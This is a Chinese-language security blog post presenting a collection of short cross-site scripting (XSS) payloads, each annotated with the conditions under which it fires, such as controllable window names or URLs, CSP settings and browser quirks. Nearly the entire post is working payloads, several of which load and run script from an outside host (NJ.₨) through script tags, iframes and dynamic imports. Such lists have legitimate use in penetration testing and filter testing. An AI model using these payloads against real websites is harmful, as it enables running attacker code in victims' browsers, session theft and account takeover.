短小精悍的XSS有效载荷,可以在不同情况下使用

作者:Sec-Labs | 发布时间:

短小精悍的XSS payload

一组短小的XSS有效载荷,可用于不同的环境中。

DEMO可在此获得:https://tinyxss.terjanq.me

Payloads

<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>

<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>

<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>

<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>

<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>

<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>

<!-- Just a casual script -->
<script/src=//NJ.₨></script>

<!-- If you control the name of the window -->
<iframe/onload=src=top.name>

<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>

<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>

<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">

<!-- If inline styles are allowed -->
<style/onload=eval(name)>

<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>

<!-- If inline styles are blocked -->
<style/onerror=eval(name)>

<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>

<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>

<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\NJ.₨/)>

废弃的:

<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>

<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>

标签:xss攻击, payload字典